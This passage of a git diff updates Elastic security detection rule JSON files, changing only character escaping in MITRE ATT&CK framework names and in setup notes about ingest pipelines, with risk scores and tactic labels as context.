- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_107.json b/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_107.json
index eb32fca18e5..aa18401d45e 100644
--- a/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_107.json
@@ -60,7 +60,7 @@
 ],
 "risk_score": 47,
 "rule_id": "b5877334-677f-4fb9-86d5-a9721274223b",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -96,7 +96,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_108.json b/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_108.json
index e62cd86cabd..23f3c524fa9 100644
--- a/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/b5877334-677f-4fb9-86d5-a9721274223b_108.json
@@ -60,7 +60,7 @@
 ],
 "risk_score": 47,
 "rule_id": "b5877334-677f-4fb9-86d5-a9721274223b",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -96,7 +96,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_105.json b/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_105.json
index 7158d6f8238..909e1217d7e 100644
--- a/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_105.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 73,
 "rule_id": "b5ea4bfe-a1b2-421f-9d47-22a75a6f2921",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_106.json b/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_106.json
index 0beba236bfb..7e8d32ba94b 100644
--- a/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_106.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 73,
 "rule_id": "b5ea4bfe-a1b2-421f-9d47-22a75a6f2921",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_107.json b/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_107.json
index e349886f20a..61497a77440 100644
--- a/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_107.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 73,
 "rule_id": "b5ea4bfe-a1b2-421f-9d47-22a75a6f2921",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_108.json b/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_108.json
index b7cebdee7fc..38247dff313 100644
--- a/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_108.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 73,
 "rule_id": "b5ea4bfe-a1b2-421f-9d47-22a75a6f2921",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_101.json b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_101.json
index 902536dd480..e7c8aded4d6 100644
--- a/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_101.json
@@ -43,7 +43,7 @@
 ],
 "risk_score": 47,
 "rule_id": "b627cd12-dac4-11ec-9582-f661ea17fbcd",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_102.json b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_102.json
index 8c78c8eacc5..3609dee4698 100644
--- a/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_102.json
@@ -43,7 +43,7 @@
 ],
 "risk_score": 47,
 "rule_id": "b627cd12-dac4-11ec-9582-f661ea17fbcd",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_103.json b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_103.json
index d9579f35117..a61e6afc916 100644
--- a/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_103.json
@@ -43,7 +43,7 @@
 ],
 "risk_score": 47,
 "rule_id": "b627cd12-dac4-11ec-9582-f661ea17fbcd",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_104.json b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_104.json
index 82fd0707809..38c21fb87f6 100644
--- a/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_104.json
@@ -43,7 +43,7 @@
 ],
 "risk_score": 47,
 "rule_id": "b627cd12-dac4-11ec-9582-f661ea17fbcd",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_105.json b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_105.json
index dcd5fe51873..7cac9457c21 100644
--- a/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_105.json
@@ -42,7 +42,7 @@
 ],
 "risk_score": 47,
 "rule_id": "b627cd12-dac4-11ec-9582-f661ea17fbcd",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_104.json b/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_104.json
index 688896dbb8f..b5e58a6ad41 100644
--- a/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_104.json
@@ -101,7 +101,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -123,7 +123,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_105.json b/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_105.json
index 3181953479c..172850885ba 100644
--- a/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_105.json
@@ -100,7 +100,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -122,7 +122,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_106.json b/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_106.json
index 821bccaad1e..0e0e4c6f183 100644
--- a/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_106.json
@@ -101,7 +101,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -123,7 +123,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_107.json b/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_107.json
index 90de7cade8d..56a82949af2 100644
--- a/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_107.json
@@ -101,7 +101,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -123,7 +123,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/b6dce542-2b75-4ffb-b7d6-38787298ba9d_102.json b/packages/security_detection_engine/kibana/security_rule/b6dce542-2b75-4ffb-b7d6-38787298ba9d_102.json
index 50d6cb8788c..18e5675ec5c 100644
--- a/packages/security_detection_engine/kibana/security_rule/b6dce542-2b75-4ffb-b7d6-38787298ba9d_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/b6dce542-2b75-4ffb-b7d6-38787298ba9d_102.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -73,7 +73,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0010",
 "name": "Exfiltration",
diff --git a/packages/security_detection_engine/kibana/security_rule/b6dce542-2b75-4ffb-b7d6-38787298ba9d_103.json b/packages/security_detection_engine/kibana/security_rule/b6dce542-2b75-4ffb-b7d6-38787298ba9d_103.json
index 0d8cad42b7b..751072f754a 100644
--- a/packages/security_detection_engine/kibana/security_rule/b6dce542-2b75-4ffb-b7d6-38787298ba9d_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/b6dce542-2b75-4ffb-b7d6-38787298ba9d_103.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -71,7 +71,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0010",
 "name": "Exfiltration",
diff --git a/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_102.json b/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_102.json
index 714378e68ed..434b607d06e 100644
--- a/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_102.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_103.json b/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_103.json
index 3ef80f7680f..31e6ee90827 100644
--- a/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_103.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_104.json b/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_104.json
index 35e6abf1a94..a3bea1580f7 100644
--- a/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_104.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_105.json b/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_105.json
index c1858d49e6d..020b9f480b6 100644
--- a/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_105.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_206.json b/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_206.json
index 39a5a4f2003..0d522e24f18 100644
--- a/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_206.json
+++ b/packages/security_detection_engine/kibana/security_rule/b719a170-3bdb-4141-b0e3-13e3cf627bfe_206.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_102.json b/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_102.json
index 2ed1862445a..39525650315 100644
--- a/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_102.json
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_103.json b/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_103.json
index 142fa19601f..81c712ec837 100644
--- a/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_103.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_104.json b/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_104.json
index 9ff8f8552a8..be2d8454efa 100644
--- a/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_104.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_205.json b/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_205.json
index 1562e1e4a2e..734277f287a 100644
--- a/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/b8075894-0b62-46e5-977c-31275da34419_205.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/b81bd314-db5b-4d97-82e8-88e3e5fc9de5_1.json b/packages/security_detection_engine/kibana/security_rule/b81bd314-db5b-4d97-82e8-88e3e5fc9de5_1.json
index 8074936b3f7..1bfc4b5b8b5 100644
--- a/packages/security_detection_engine/kibana/security_rule/b81bd314-db5b-4d97-82e8-88e3e5fc9de5_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/b81bd314-db5b-4d97-82e8-88e3e5fc9de5_1.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/b81bd314-db5b-4d97-82e8-88e3e5fc9de5_2.json b/packages/security_detection_engine/kibana/security_rule/b81bd314-db5b-4d97-82e8-88e3e5fc9de5_2.json
index 1dcf2d2702e..a94de9b22a4 100644
--- a/packages/security_detection_engine/kibana/security_rule/b81bd314-db5b-4d97-82e8-88e3e5fc9de5_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/b81bd314-db5b-4d97-82e8-88e3e5fc9de5_2.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_2.json b/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_2.json
index 4f38c5eb9d9..35cf5481137 100644
--- a/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_2.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -84,7 +84,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_3.json b/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_3.json
index 353bf0a6765..e1005c97fb0 100644
--- a/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_3.json
